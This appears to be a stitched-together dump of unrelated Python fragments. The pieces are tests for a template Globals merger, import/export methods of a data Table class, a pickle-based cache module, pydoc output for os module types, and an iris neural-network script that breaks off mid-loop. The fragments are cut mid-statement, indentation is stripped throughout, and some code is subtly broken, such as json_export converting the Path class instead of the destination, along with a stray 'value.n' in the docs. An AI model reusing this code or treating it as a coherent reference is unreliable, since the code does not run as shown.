class TestGlobalsPropertiesEdgeCases(TestCase):
@patch.object(GlobalProperties, "_token_of")
def test_merge_with_objects_of_unsupported_token_type(self, token_of_mock):
token_of_mock.return_value = "some random type"
properties = GlobalProperties("global value")
with self.assertRaises(TypeError):
# Raise type error because token type is invalid
properties.merge("local value")
class TestGlobalsObject(TestCase):
def setUp(self):
self._originals = {
"resource_prefix": Globals._RESOURCE_PREFIX,
"supported_properties": Globals.supported_properties
}
Globals._RESOURCE_PREFIX = "prefix_"
Globals.supported_properties = {
"prefix_type1": ["prop1", "prop2"],
"prefix_type2": ["otherprop1", "otherprop2"],
}
self.template = {
"Globals": {
"type1": {
"prop1": "value1",
"prop2": "value2"
},
"type2": {
"otherprop1": "value1",
"otherprop2": "value2"
}
}
}
def tearDown(self):
Globals._RESOURCE_PREFIX = self._originals["resource_prefix"]
Globals.supported_properties = self._originals["supported_properties"]
def test_parse_should_parse_all_known_resource_types(self):
globals = Globals(self.template)
parsed_globals = globals._parse(self.template["Globals"])
self.assertTrue("prefix_type1" in parsed_globals)
self.assertEquals(self.template["Globals"]["type1"], parsed_globals["prefix_type1"].global_properties)
self.assertTrue("prefix_type2" in parsed_globals)
self.assertEquals(self.template["Globals"]["type2"], parsed_globals["prefix_type2"].global_properties)
def test_parse_should_error_if_globals_is_not_dict(self):
template = {
"Globals": "hello"
}
with self.assertRaises(InvalidGlobalsSectionException):
Globals(template)
def test_parse_should_error_if_globals_contains_unknown_types(self):
template = {
"Globals": {
"random_type": {
"key": "value"
},
"type1": {
"key": "value"
}
}
}
with self.assertRaises(InvalidGlobalsSectionException):
Globals(template)
def test_parse_should_error_if_globals_contains_unknown_properties_of_known_type(self):
template = {
"Globals": {
"type1": {
"unknown_property": "value"
}
}
}
with self.assertRaises(InvalidGlobalsSectionException):
Globals(template)
def test_parse_should_error_if_value_is_not_dictionary(self):
template = {
"Globals": {
"type1": "string value"
}
}
with self.assertRaises(InvalidGlobalsSectionException):
Globals(template)
def test_parse_should_not_error_if_value_is_empty(self):
template = {
"Globals": {
"type1": {} # empty value
}
}
globals = Globals(template)
parsed = globals._parse(template["Globals"])
self.assertTrue("prefix_type1" in parsed)
self.assertEquals({}, parsed["prefix_type1"].global_properties)
def test_init_without_globals_section_in_template(self):
template = {
"a": "b"
}
global_obj = Globals(template)
self.assertEquals({}, global_obj.template_globals)
def test_del_section_with_globals_section_in_template(self):
template = self.template
expected = {}
Globals.del_section(template)
self.assertEquals(expected, template)
def test_del_section_with_no_globals_section_in_template(self):
template = {
"a": "b"
}
expected = {
"a": "b"
}
Globals.del_section(template)
self.assertEquals(expected, template)
@patch.object(Globals, "_parse")
def test_merge_must_actually_do_merge(self, parse_mock):
type1_mock = Mock()
type2_mock = Mock()
parse_mock.return_value = {
"type1": type1_mock,
"type2": type2_mock,
}
local_properties = {"a": "b"}
expected = "some merged value"
type1_mock.merge.return_value = expected
# Try to merge for type1
globals = Globals(self.template)
result = globals.merge("type1", local_properties)
self.assertEquals(expected, result)
type1_mock.merge.assert_called_with(local_properties)
type2_mock.merge.assert_not_called()
@patch.object(Globals, "_parse")
def test_merge_must_skip_unsupported_types(self, parse_mock):
type1_mock = Mock()
parse_mock.return_value = {
"type1": type1_mock
}
local_properties = {"a": "b"}
expected = {"a": "b"}
globals = Globals(self.template)
# Since type is not available in the globals, nothing should happen
result = globals.merge("some random type", local_properties)
self.assertEquals(expected, result)
type1_mock.merge.assert_not_called()
@patch.object(Globals, "_parse")
def test_merge_must_skip_with_no_types(self, parse_mock):
parse_mock.return_value = {
}
local_properties = {"a": "b"}
expected = {"a": "b"}
globals = Globals(self.template)
# Since type is not available in the globals, nothing should happen
result = globals.merge("some random type", local_properties)
self.assertEquals(expected, result)
def test_merge_end_to_end_on_known_type1(self):
type = "prefix_type1"
properties = {
"prop1": "overridden value",
"a": "b",
"key": [1,2,3]
}
expected = {
"prop1": "overridden value",
"prop2": "value2", # inherited from global
"a": "b",
"key": [1,2,3]
}
globals = Globals(self.template)
result = globals.merge(type, properties)
self.assertEquals(expected, result)
def test_merge_end_to_end_on_known_type2(self):
type = "prefix_type2"
properties = {
"a": "b",
"key": [1,2,3]
}
expected = {
"otherprop1": "value1", # inherited from global
"otherprop2": "value2", # inherited from global
"a": "b",
"key": [1,2,3]
| |
transform function, then the attribute will
be set to the given default value
@type transforms: dict (optional)
@param filters: dict of functions by attribute name; if given, each
newly-read record will be filtered before being added to the table, with each
filter function run using the corresponding attribute; if any filter function
returns False, the record is not added to the table. Useful when reading large
input files, to pre-screen only for data matching one or more filters
@type filters: dict (optional)
@param row_class: class to construct for each imported row when populating table (default=DataObject)
@type row_class: type
@param limit: number of records to import
@type limit: int (optional)
@param kwargs: additional arguments for the excel reader. Only available argument is "sheet" to select which
sheet to read (defaults to active sheet)
@type kwargs: named arguments (optional)
@param fieldnames: names for imported columns; used if there is no header line in the input file
@type fieldnames: list[str] or str
"""
kwargs["fieldnames"] = fieldnames.split() if isinstance(fieldnames, str) else fieldnames
return self._excel_import(
excel_source,
transforms=transforms,
filters=filters,
row_class=row_class,
limit=limit,
**kwargs,
)
def csv_export(
self,
csv_dest: _ImportExportDataContainer,
fieldnames: Iterable[str] = None,
encoding: str = "utf-8",
delimiter: str = ",",
**kwargs,
):
"""
Exports the contents of the table to a CSV-formatted file.
@param csv_dest: CSV file - if a string is given, the file with that name will be
opened, written, and closed; if a file object is given, then that object
will be written as-is, and left for the caller to be closed.
@type csv_dest: string or file
@param fieldnames: attribute names to be exported; can be given as a single
string with space-delimited names, or as a list of attribute names
@type fieldnames: list of strings
@param encoding: string (default="UTF-8"); if csv_dest is provided as a string
representing an output filename, an encoding argument can be provided
@type encoding: string
@param delimiter: string (default=",") - overridable delimiter for value separator
@type delimiter: string
@param kwargs: additional keyword args to pass through to csv.DictWriter
@type kwargs: named arguments (optional)
"""
writer_args = dict(
(k, v)
for k, v in kwargs.items()
if k
not in [
"encoding",
"csv_dest",
"fieldnames",
]
)
close_on_exit = False
if isinstance(csv_dest, Path):
csv_dest = str(csv_dest)
if isinstance(csv_dest, str):
csv_dest = open(csv_dest, "w", newline="", encoding=encoding)
close_on_exit = True
try:
if fieldnames is None:
fieldnames = self._attr_names()
if isinstance(fieldnames, str):
fieldnames = fieldnames.split()
csv_dest.write(delimiter.join(fieldnames) + NL)
csvout = csv.DictWriter(
csv_dest,
fieldnames,
extrasaction="ignore",
lineterminator=NL,
delimiter=delimiter,
**writer_args,
)
try:
csvout.writerows(_to_dict(o) for o in self.obs)
except UnableToExtractAttributeNamesError:
attr_fetch = operator.attrgetter(*fieldnames)
for o in self.obs:
csvout.writerow(ODict(zip(fieldnames, attr_fetch(o))))
finally:
if close_on_exit:
csv_dest.close()
def tsv_export(
self,
tsv_dest: _ImportExportDataContainer,
fieldnames: Iterable[str] = None,
encoding: str = "UTF-8",
**kwargs,
):
r"""
Similar to csv_export, with delimiter="\t"
"""
return self.csv_export(
tsv_dest, fieldnames=fieldnames, encoding=encoding, delimiter="\t", **kwargs
)
def json_import(
self,
source: _ImportExportDataContainer,
encoding: str = "UTF-8",
transforms: Dict = None,
row_class: type = None,
) -> "Table":
"""
Imports the contents of a JSON data file into this table.
@param source: JSON data file - if a string is given, the file with that name will be
opened, read, and closed; if a file object is given, then that object
will be read as-is, and left for the caller to be closed.
@type source: string or file
@param transforms: dict of functions by attribute name; if given, each
attribute will be transformed using the corresponding transform; if there is no
matching transform, the attribute will be read as a string (default); the
transform function can also be defined as a (function, default-value) tuple; if
there is an Exception raised by the transform function, then the attribute will
be set to the given default value
@type transforms: dict (optional)
@param row_class: class to construct for each imported row when populating table (default=DataObject)
@type row_class: type
"""
class _JsonFileReader:
def __init__(self, src):
self.source = src
def __iter__(self):
current = ""
for line in self.source:
if current:
current += " "
current += line
try:
yield json.loads(current)
current = ""
except Exception:
pass
if row_class is None:
row_class = default_row_class
return self._import(
source,
encoding,
transforms=transforms,
reader=_JsonFileReader,
row_class=row_class,
)
def json_export(
self,
dest: _ImportExportDataContainer,
fieldnames: Union[Iterable[str], str] = None,
encoding: str = "UTF-8",
):
"""
Exports the contents of the table to a JSON-formatted file.
@param dest: output file - if a string is given, the file with that name will be
opened, written, and closed; if a file object is given, then that object
will be written as-is, and left for the caller to be closed.
@type dest: string or file
@param fieldnames: attribute names to be exported; can be given as a single
string with space-delimited names, or as a list of attribute names
@type fieldnames: list of strings
@param encoding: string (default="UTF-8"); if csv_dest is provided as a string
representing an output filename, an encoding argument can be provided
@type encoding: string
"""
close_on_exit = False
if isinstance(dest, Path):
dest = str(Path)
if isinstance(dest, str):
dest = open(dest, "w", encoding=encoding)
close_on_exit = True
try:
if isinstance(fieldnames, str):
fieldnames = fieldnames.split()
if fieldnames is None:
for o in self.obs:
dest.write(_to_json(o) + "\n")
else:
for o in self.obs:
dest.write(
json.dumps(ODict((f, getattr(o, f)) for f in fieldnames)) + "\n"
)
finally:
if close_on_exit:
dest.close()
def excel_export(
self,
excel_dest: _ImportExportDataContainer,
fieldnames: Iterable[str] = None,
**kwargs,
):
if openpyxl is None:
raise Exception("openpyxl module not installed")
if kwargs.pop('lxml', True) is False:
lxml = None
else:
try:
import lxml
except ImportError:
lxml = None
if lxml is not None:
wb = openpyxl.Workbook(write_only=True)
ws = wb.create_sheet()
else:
wb = openpyxl.Workbook()
ws = wb.active
# set header rows
if fieldnames is None:
fieldnames = self._attr_names()
elif isinstance(fieldnames, str):
fieldnames = fieldnames.split()
ws.append(fieldnames)
# append data
for o in self.obs:
ws.append([v for v in _to_dict(o).values()])
wb.save(excel_dest)
def add_field(
self, attrname: str, fn: Callable[[Any], Any], default: Any = None
) -> "Table":
"""
Computes a new attribute for each object in table, or replaces an
existing attribute in each record with a computed value
@param attrname: attribute to compute for each object
@type attrname: string
@param fn: function used to compute new attribute value, based on
other values in the object, as in::
lambda ob : ob.commission_pct/100.0 * ob.gross_sales
@type fn: function(obj) returns value
@param default: value to use if an exception is raised while trying
to evaluate fn
"""
try:
for rec_ in self:
try:
val = fn(rec_)
except Exception:
val = default
if isinstance(rec_, DataObject):
rec_.__dict__[attrname] = val
else:
setattr(rec_, attrname, val)
except AttributeError:
raise AttributeError(
f"cannot add/modify attribute {attrname!r} in table records"
)
return self
def groupby(self, keyexpr, **outexprs):
"""
simple prototype of group by, with support for expressions in the group-by clause
and outputs
@param keyexpr: grouping field and optional expression for computing the key value;
if a string is passed
@type keyexpr: string or tuple
@param outexprs: named arguments describing one or more summary values to
compute per key
@type outexprs: callable, taking a sequence of objects as input and returning
a single summary value
"""
if isinstance(keyexpr, str):
keyattrs = keyexpr.split()
keyfn = lambda o: tuple(getattr(o, k) for k in keyattrs)
elif isinstance(keyexpr, tuple):
keyattrs = (keyexpr[0],)
keyfn = keyexpr[1]
else:
raise TypeError("keyexpr must be string or tuple")
grouped_obs = defaultdict(list)
for ob in self.obs:
grouped_obs[keyfn(ob)].append(ob)
tbl = Table()
for k in keyattrs:
tbl.create_index(k, unique=(len(keyattrs) == 1))
for key, recs in sorted(grouped_obs.items()):
group_obj = default_row_class(**dict(zip(keyattrs, key)))
for subkey, expr in outexprs.items():
setattr(group_obj, subkey, expr(recs))
tbl.insert(group_obj)
return tbl
def splitby(self, pred: Union[str, PredicateFunction]) -> Tuple["Table", "Table"]:
"""
Takes a predicate function (takes a table record and returns True or False)
and returns two tables: a table with all the rows that returned False and
a table with all the rows that returned True. Will also accept a string
indicating a particular field name, and uses `bool(getattr(rec, field_name))`
for | |
<filename>data/cache.py
import os
import pickle
from typing import Optional, Dict
import config as cf
import numpy as np
from data.datasets import Dataset
from data.preprocessor import Preprocessor
from utils import log
from utils.singleton import Singleton
class Cache(metaclass=Singleton):
"""This singleton class handles persisting and loading of user-defined data in order to reduce the need of
re-calculation.
"""
# this version will be added to each created cached file. if the version number stored in a loaded file is
# smaller than this, it will not be used
# -> increase it whenever old cache data is incompatible
_cache_version = 8
# the following keys will be used to access the cached data in a dictionary
# they will also be used as the name of the file they will be saved to
# Dataset keys
KEY_DATA_X = "x"
KEY_DATA_Y = "y"
KEY_CACHE_VERSION = "cache_version"
KEY_CONFIG = "config"
KEY_NEXT_NEW_IID = "next_new_iid"
KEY_LABEL_IDS = "label_ids"
KEY_LABEL_NAME_BY_ID = "label_name_by_id"
KEY_LABEL_ID_BY_NAME = "label_id_by_name"
KEY_PREPROCESSOR = "preprocessor"
# file list loader keys
CATEGORY_PREFIX_FILE_LIST_LOADER = "file_list_loader_"
KEY_FLL_IMG_INFOS_PER_DS = "image_infos_per_dataset"
KEY_FLL_IMG_INFOS = "image_infos"
KEY_FLL_IMG_INFOS_PER_IID = "image_infos_per_iid_label"
def __init__(self):
"""Create the singleton object."""
# ensure that the root cache path does exist
if not os.path.exists(self._ds_path("")):
os.makedirs(self._ds_path(""))
# inform the user about deprecated cache data
deprecated_cache_num = self._count_old_cache_version_folders()
if deprecated_cache_num > 0:
log.log("Found {} deprecated cache folders. Go ahead and delete them manually.".format(deprecated_cache_num))
def _ds_path(self, dataset_key: str, suffix=None, suffix_extension=".npy") -> str:
"""Get the file path to the specified dataset cache.
Note, datasets are cached in a slightly-different structure than other objects.
:param dataset_key: The key identifying the dataset which should be cached.
:param suffix: An additional suffix which will be appended to the base file name.
:param suffix_extension: The file extension. Either ".npy" or ".p".
:return:
"""
# each version gets its own subdirectory
path = os.path.join(self._base_path("dataset"), "{}x{}".format(
cf.get("img_width"),
cf.get("img_height")
))
# each dataset, too
path = os.path.join(path, dataset_key)
# suffix is used for the actual file name + .npy
if suffix is not None:
path = os.path.join(path, suffix + suffix_extension)
return path
def _base_path(self, category, suffix=None, suffix_extension=".npy") -> str:
"""Get the file path to the given non-dataset cache element.
:param category: Cache elements are grouped in categories.
:param suffix: This suffix should describe the individual element of the associated category.
:param suffix_extension: The file extension. Either ".npy" or ".p".
:return:
"""
# each version gets its own subdirectory
path = os.path.join(cf.get("cache_path_root"), "v{}".format(
self._cache_version,
))
# each dataset, too
path = os.path.join(path, category)
# suffix is used for the actual file name + .npy
if suffix is not None:
path = os.path.join(path, suffix + suffix_extension)
return path
def load_dataset(self, dataset_key: str) -> Optional[Dict]:
"""Return the requested dataset parts structured in a dictionary, or None if not available/valid.
:param dataset_key: The key identifying the dataset which should be loaded from cache.
:return:
"""
# if a cached file does exist
if os.path.isfile(self._ds_path(dataset_key, self.KEY_CACHE_VERSION)):
log.log("Found cached data")
log.log(".. loading cached dataset {}".format(dataset_key))
loaded_data = dict()
for file_name in os.listdir(self._ds_path(dataset_key)):
key = os.path.splitext(file_name)[0]
if file_name.endswith(".npy"):
loaded_data[key] = np.load(self._ds_path(dataset_key, key))
elif file_name.endswith(".p"):
with open(self._ds_path(dataset_key, key, ".p"), "rb") as input_file:
loaded_data[key] = pickle.load(input_file)
log.log(".. dataset has been loaded successfully from the cache")
# restore class attributes
# TODO do not use private vars, ensure that no conflict between different datasets can exist
log.log(".. loading global meta information about available labels")
Dataset._next_new_iid = loaded_data[self.KEY_NEXT_NEW_IID]
Dataset._label_internal_ids = loaded_data[self.KEY_LABEL_IDS]
Dataset._label_name_by_internal_id = loaded_data[self.KEY_LABEL_NAME_BY_ID]
Dataset._label_internal_id_by_name = loaded_data[self.KEY_LABEL_ID_BY_NAME]
return loaded_data
else:
log.log("Cache for dataset {} is empty".format(
dataset_key
))
return None
def load(self, category, data_keys=None) -> Optional[Dict]:
"""Return the requested non-dataset data from cache, or None if not available/valid.
:param category: The category which should be (partially) loaded.
:param data_keys: If None, all found files of that category will be loaded. Otherwise, only the specified ones.
:return:
"""
# if a cached category folder does exist
if not self.is_empty(category, data_keys):
if data_keys is None:
log.log("Loading everything from cached category {}".format(category))
else:
log.log("Loading {} from cached category {}".format(category, data_keys))
loaded_data = dict()
for file_name in os.listdir(self._base_path(category)):
key = os.path.splitext(file_name)[0]
if data_keys is None or key in data_keys:
if file_name.endswith(".npy"):
loaded_data[key] = np.load(self._base_path(category, key))
elif file_name.endswith(".p"):
with open(self._base_path(category, key, ".p"), "rb") as input_file:
loaded_data[key] = pickle.load(input_file)
log.log(".. category {} has been loaded successfully from the cache".format(category))
return loaded_data
else:
if data_keys is None:
log.log("Cache for category {} is completely empty".format(
category
))
else:
log.log("Cache for category {} and data keys {} is empty".format(
category,
data_keys
))
return None
def load_single(self, category: str, data_key: str):
"""Load only a single data file from the cached category.
:param category: The category which should be partially loaded.
:param data_key: A key describing the specific element of the given category.
:return: None, if no such element has been cached.
"""
result_list = self.load(category, [data_key])
if result_list is not None:
result_list = result_list[data_key]
return result_list
def is_empty(self, category: str, data_keys=None) -> bool:
"""Check whether any (specific) data for category has been cached.
:param category: The category which should be checked.
:param data_keys: If None, just any data needs to exist. Otherwise, at least one file specified by the data_keys.
:return:
"""
category_dir_exists = os.path.isdir(self._base_path(category))
if category_dir_exists and data_keys is not None:
is_empty = True
for file_name in os.listdir(self._base_path(category)):
key = os.path.splitext(file_name)[0]
if key in data_keys:
is_empty = False
break
else:
is_empty = not category_dir_exists
return is_empty
def save(self, category: str, data, suffix_extension=".npy"):
"""Save an arbitrary category to the cache.
Currently, all elements of data must use the same suffix_extension.
:param category: The category which should be saved.
:param data: The actual data that should be cached.
:param suffix_extension: The file extension. Either ".npy" or ".p".
:return:
"""
# create folder for this category
if not os.path.exists(self._base_path(category)):
os.makedirs(self._base_path(category))
# each element of the data dictionary to a separate file
for key, value in data.items():
log.log(" .. saving {}.{}".format(
category,
key
))
if suffix_extension == ".npy":
np.save(self._base_path(category, key, suffix_extension), value)
else:
with open(self._base_path(category, key, ".p"), "wb") as output_file:
pickle.dump(value, output_file)
# additional log message to signal the end of this category cache. but only, if there is more than one file
if len(data) > 1:
log.log(".. saved {}".format(category))
def save_single(self, category, data_key, data_value, suffix_extension=".npy"):
"""Save only a single data file of a category."""
self.save(category, {data_key: data_value}, suffix_extension)
def save_dataset(self, dataset_key: str, x: np.ndarray, y: np.ndarray, preprocessor: Preprocessor):
"""Cache the specified dataset.
Does not work directly with a Dataset object to allow saving python lists of x and y before they are
converted to numpy arrays. the latter can not happen inplace and might cause a memory error. While first saving
them to disk, will result in an automatic conversion to numpy arrays which do not need the memory.
:param dataset_key: The key identifying the dataset which should be saved.
:param x: The raw data of the associated dataset.
:param y: The label data of the associated dataset.
:param preprocessor: The preprocessor of the associated dataset.
:return:
"""
# create folder for this dataset
if not os.path.exists(self._ds_path(dataset_key)):
os.makedirs(self._ds_path(dataset_key))
data_np = dict()
data_np[self.KEY_CACHE_VERSION] = self._cache_version
# do not save the complete dataset object, but X and Y.
# this way the calculated data will be restored, but parameters for splitting etc. can be refreshed
data_np[self.KEY_DATA_X] = x
data_np[self.KEY_DATA_Y] = y
# add the complete current configuration to ensure that no information about the loaded dataset are missing
data_np[self.KEY_CONFIG] = cf._cf
# save each element of the dictionary to a separate file
for key, value in data_np.items():
np.save(self._ds_path(dataset_key, key), value)
# pickle instead of numpy
data_pickle = dict()
# store further dataset class attributes
# TODO do not use private vars
data_pickle[self.KEY_NEXT_NEW_IID] = Dataset._next_new_iid
data_pickle[self.KEY_LABEL_IDS] = Dataset._label_internal_ids
data_pickle[self.KEY_LABEL_NAME_BY_ID] = Dataset._label_name_by_internal_id
data_pickle[self.KEY_LABEL_ID_BY_NAME] = Dataset._label_internal_id_by_name
data_pickle[self.KEY_PREPROCESSOR] = preprocessor
for key, value in data_pickle.items():
with open(self._ds_path(dataset_key, key, ".p"), "wb") as output_file:
pickle.dump(value, output_file)
log.log("Cached dataset " + dataset_key)
# save copy of current log file, but don't flush
log.log_save(self._ds_path(dataset_key), flush=False)
def _count_old_cache_version_folders(self) -> int:
"""Get the number of | |
| Return self!=value.
|
| __rmul__(self, value, /)
| Return self*value.
|
| __sizeof__(...)
| T.__sizeof__() -- size of T in memory, in bytes
|
| count(...)
| T.count(value) -> integer -- return number of occurrences of value
|
| index(...)
| T.index(value, [start, [stop]]) -> integer -- return first index of value.
| Raises ValueError if the value is not present.
class terminal_size(builtins.tuple)
| A tuple of (columns, lines) for holding terminal window size
|
| Method resolution order:
| terminal_size
| builtins.tuple
| builtins.object
|
| Methods defined here:
|
| __new__(*args, **kwargs) from builtins.type
| Create and return a new object. See help(type) for accurate signature.
|
| __reduce__(...)
|
| __repr__(self, /)
| Return repr(self).
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| columns
| width of the terminal window in characters
|
| lines
| height of the terminal window in characters
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| n_fields = 2
|
| n_sequence_fields = 2
|
| n_unnamed_fields = 0
|
| ----------------------------------------------------------------------
| Methods inherited from builtins.tuple:
|
| __add__(self, value, /)
| Return self+value.
|
| __contains__(self, key, /)
| Return key in self.
|
| __eq__(self, value, /)
| Return self==value.
|
| __ge__(self, value, /)
| Return self>=value.
|
| __getattribute__(self, name, /)
| Return getattr(self, name).
|
| __getitem__(self, key, /)
| Return self[key].
|
| __getnewargs__(...)
|
| __gt__(self, value, /)
| Return self>value.
|
| __hash__(self, /)
| Return hash(self).
|
| __iter__(self, /)
| Implement iter(self).
|
| __le__(self, value, /)
| Return self<=value.
|
| __len__(self, /)
| Return len(self).
|
| __lt__(self, value, /)
| Return self<value.
|
| __mul__(self, value, /)
| Return self*value.n
|
| __ne__(self, value, /)
| Return self!=value.
|
| __rmul__(self, value, /)
| Return self*value.
|
| __sizeof__(...)
| T.__sizeof__() -- size of T in memory, in bytes
|
| count(...)
| T.count(value) -> integer -- return number of occurrences of value
|
| index(...)
| T.index(value, [start, [stop]]) -> integer -- return first index of value.
| Raises ValueError if the value is not present.
class times_result(builtins.tuple)
| times_result: Result from os.times().
|
| This object may be accessed either as a tuple of
| (user, system, children_user, children_system, elapsed),
| or via the attributes user, system, children_user, children_system,
| and elapsed.
|
| See os.times for more information.
|
| Method resolution order:
| times_result
| builtins.tuple
| builtins.object
|
| Methods defined here:
|
| __new__(*args, **kwargs) from builtins.type
| Create and return a new object. See help(type) for accurate signature.
|
| __reduce__(...)
|
| __repr__(self, /)
| Return repr(self).
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| children_system
| system time of children
|
| children_user
| user time of children
|
| elapsed
| elapsed time since an arbitrary point in the past
|
| system
| system time
|
| user
| user time
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| n_fields = 5
|
| n_sequence_fields = 5
|
| n_unnamed_fields = 0
|
| ----------------------------------------------------------------------
| Methods inherited from builtins.tuple:
|
| __add__(self, value, /)
| Return self+value.
|
| __contains__(self, key, /)
| Return key in self.
|
| __eq__(self, value, /)
| Return self==value.
|
| __ge__(self, value, /)
| Return self>=value.
|
| __getattribute__(self, name, /)
| Return getattr(self, name).
|
| __getitem__(self, key, /)
| Return self[key].
|
| __getnewargs__(...)
|
| __gt__(self, value, /)
| Return self>value.
|
| __hash__(self, /)
| Return hash(self).
|
| __iter__(self, /)
| Implement iter(self).
|
| __le__(self, value, /)
| Return self<=value.
|
| __len__(self, /)
| Return len(self).
|
| __lt__(self, value, /)
| Return self<value.
|
| __mul__(self, value, /)
| Return self*value.n
|
| __ne__(self, value, /)
| Return self!=value.
|
| __rmul__(self, value, /)
| Return self*value.
|
| __sizeof__(...)
| T.__sizeof__() -- size of T in memory, in bytes
|
| count(...)
| T.count(value) -> integer -- return number of occurrences of value
|
| index(...)
| T.index(value, [start, [stop]]) -> integer -- return first index of value.
| Raises ValueError if the value is not present.
class uname_result(builtins.tuple)
| uname_result: Result from os.uname().
|
| This object may be accessed either as a tuple of
| (sysname, nodename, release, version, machine),
| or via the attributes sysname, nodename, release, version, and machine.
|
| See os.uname for more information.
|
| Method resolution order:
| uname_result
| builtins.tuple
| builtins.object
|
| Methods defined here:
|
| __new__(*args, **kwargs) from builtins.type
| Create and return a new object. See help(type) for accurate signature.
|
| __reduce__(...)
|
| __repr__(self, /)
| Return repr(self).
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| machine
| hardware identifier
|
| nodename
| name of machine on network (implementation-defined)
|
| release
| operating system release
|
| sysname
| operating system name
|
| version
| operating system version
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| n_fields = 5
|
| n_sequence_fields = 5
|
| n_unnamed_fields = 0
|
| ----------------------------------------------------------------------
| Methods inherited from builtins.tuple:
|
| __add__(self, value, /)
| Return self+value.
|
| __contains__(self, key, /)
| Return key in self.
|
| __eq__(self, value, /)
| Return self==value.
|
| __ge__(self, value, /)
| Return self>=value.
|
| __getattribute__(self, name, /)
| Return getattr(self, name).
|
| __getitem__(self, key, /)
| Return self[key].
|
| __getnewargs__(...)
|
| __gt__(self, value, /)
| Return self>value.
|
| __hash__(self, /)
| Return hash(self).
|
| __iter__(self, /)
| Implement iter(self).
|
| __le__(self, value, /)
| Return self<=value.
|
| __len__(self, /)
| Return len(self).
|
| __lt__(self, value, /)
| Return self<value.
|
| __mul__(self, value, /)
| Return self*value.n
|
| __ne__(self, value, /)
| Return self!=value.
|
| __rmul__(self, value, /)
| Return self*value.
|
| __sizeof__(...)
| T.__sizeof__() -- size of T in memory, in bytes
|
| count(...)
| T.count(value) -> integer -- return number of occurrences of value
|
| index(...)
| T.index(value, [start, [stop]]) -> integer -- return first index of value.
| Raises ValueError if the value is not present.
FUNCTIONS
_exit(...)
_exit(status)
Exit to the system with specified status, without normal exit processing.
abort(...)
abort() -> does not return!
Abort the interpreter immediately. This 'dumps core' or otherwise fails
in the hardest way possible on the hosting operating system.
access(path, mode, *, dir_fd=None, effective_ids=False, follow_symlinks=True)
Use the real uid/gid to test for access to a path.
path
Path to be tested; can be string, bytes, or open-file-descriptor int.
mode
Operating-system mode bitfield. Can be F_OK to test existence,
or the inclusive-OR of R_OK, W_OK, and X_OK.
dir_fd
If not None, it should be a file descriptor open to a directory,
and path should be relative; path will then be relative to that
directory.
effective_ids
If True, access will use the effective uid/gid instead | |
"""
Created on Thu Oct 24 15:06:36 2019
+++++++.I+.@author: <NAME>
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn import preprocessing
from sklearn.preprocessing import normalize
# Sigmoid Function
def sigmoid(x):
return 1 / (1 + np.exp(-x))
# Derivative of Sigmoid Function
def derivative_sigmoid(x):
return x * (1 - x)
def softmax(x):
expA = np.exp(x)
return expA / expA.sum(axis=1, keepdims=True)
#Iris dataset
np.random.seed(42)
# Load dataset.
iris = load_iris()
inputs, output = iris.data, iris.target
#split data into training and test data.
X1, test_X, train_y, test_y = train_test_split(inputs, output, train_size=0.8, test_size=0.2, random_state=123)
##train data
y1 = np.reshape(train_y, (120,1))
y= np.zeros((120, 3))
for i in range(120):
y[i, y1[i]] = 1
X=normalize(X1, axis=0)
## test data
Xt=normalize(test_X, axis=0)
aXt = np.zeros((len(X), 4),float)
aXt[0:len(Xt),0:4] = Xt
y1t= np.reshape(test_y, (30,1))
yt=np.zeros((30,3))
for l in range(30):
yt[l, y1t[l]] = 1
#parametros
epoch = 10000 # number of training iterations
learning_rate = 0.01
# Dimension of each layer s
d_in = X.shape[1] # number of features in the input dataset
d_h1 = 4 # neurons hidden layers + 1
d_out = 3 # output layer
# number of hidden layers
nhlayers1= 5
accuracy = np.zeros((10, 10),float)
for nhlayers in range(nhlayers1):
for d_h in range(1,d_h1):
print("neuronas", d_h, "layer", nhlayers)
total_correct = 0
if nhlayers < 3:
# 1 hidden layer
if nhlayers == 0:
wh = np.random.uniform(size=(d_in, d_h))
bh = np.random.uniform(size=(1, d_h))
wout = np.random.uniform(size=(d_h, d_out))
bout = np.random.uniform(size=(1, d_out))
for i in range(epoch):
# Forward pass
h = sigmoid(X.dot(wh) + bh)
y_pred = softmax(h.dot(wout) + bout)
# Compute and print loss
#loss = (y_pred - y).sum()
sum_score = 0.0
for t in range(len(y)):
for l in range(len(y[t])):
sum_score += y[t][l]*np.log(1e-15 + y_pred[t][l])
mean_sum_score = 1.0/ len(y)*sum_score
#loss = np.sum(-y * np.log(y_pred))
if i % 1 == 0:
print('Epoch', i, ':', -mean_sum_score)
# Backpropagation to compute gradients
grad_y_pred = (y - y_pred) #* derivative_sigmoid(y_pred)
grad_wout = h.T.dot(grad_y_pred)
grad_bout = np.sum(grad_y_pred, axis=0, keepdims=True)
grad_h = grad_y_pred.dot(wout.T) * derivative_sigmoid(h)
grad_wh = X.T.dot(grad_h)
grad_bh = np.sum(grad_h, axis=0, keepdims=True)
# Update weights and biases
wout += grad_wout * learning_rate
bout += grad_bout * learning_rate
wh += grad_wh * learning_rate
bh += grad_bh * learning_rate
#test
h = sigmoid(Xt.dot(wh) + bh)
y_predt = softmax(h.dot(wout) + bout)
for n in range(len(Xt)):
if (np.argmax(yt, axis=1)[n] == np.argmax(y_predt, axis=1)[n]):
total_correct += 1
accuracy[nhlayers,d_h-1] = total_correct/len(Xt)*100
# 2 hidden layer
elif nhlayers == 1:
wh = np.random.uniform(size=(d_in, d_h))
bh = np.random.uniform(size=(1, d_h))
wh1 = np.random.uniform(size=(d_h, d_h))
bh1 = np.random.uniform(size=(1, d_h))
wout = np.random.uniform(size=(d_h, d_out))
bout = np.random.uniform(size=(1, d_out))
for i in range(epoch):
# Forward pass
h = sigmoid(X.dot(wh) + bh)
h1 = sigmoid(h.dot(wh1)+ bh1)
y_pred = softmax(h1.dot(wout) + bout)
# Compute and print loss
#loss = (y_pred - y).sum()
sum_score = 0.0
for t in range(len(y)):
for l in range(len(y[t])):
sum_score += y[t][l]*np.log(1e-15 + y_pred[t][l])
mean_sum_score = 1.0/ len(y)*sum_score
#loss = np.sum(-y * np.log(y_pred))
if i % 1 == 0:
print('Epoch', i, ':', -mean_sum_score)
# Backpropagation to compute gradients
